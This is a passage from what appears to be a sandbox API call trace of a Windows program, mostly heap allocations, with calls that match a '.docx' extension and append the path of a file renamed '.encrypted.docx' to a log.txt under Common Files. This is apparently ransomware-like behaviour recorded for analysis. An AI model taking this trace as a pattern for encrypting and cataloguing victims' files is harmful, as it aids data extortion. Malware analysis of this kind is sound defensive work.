returned 0x7ab260 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.140] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbf8 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.140] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.142] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.142] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.143] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0033.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.144] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0033.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c5448 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0033.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.146] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.146] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xee4, lpOverlapped=0x0) returned 1 [0033.146] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xee4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.147] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0033.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.encrypted.docx\r\n", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0033.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x45) returned 0x88e138 [0033.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.encrypted.docx\r\n", cchWideChar=69, lpMultiByteStr=0x88e138, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.encrypted.docx\r\n", lpUsedDefaultChar=0x0) returned 69 [0033.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0033.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0033.147] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x44, lpOverlapped=0x0) returned 1 [0033.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0033.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.147] CloseHandle (hObject=0x140) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0033.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | 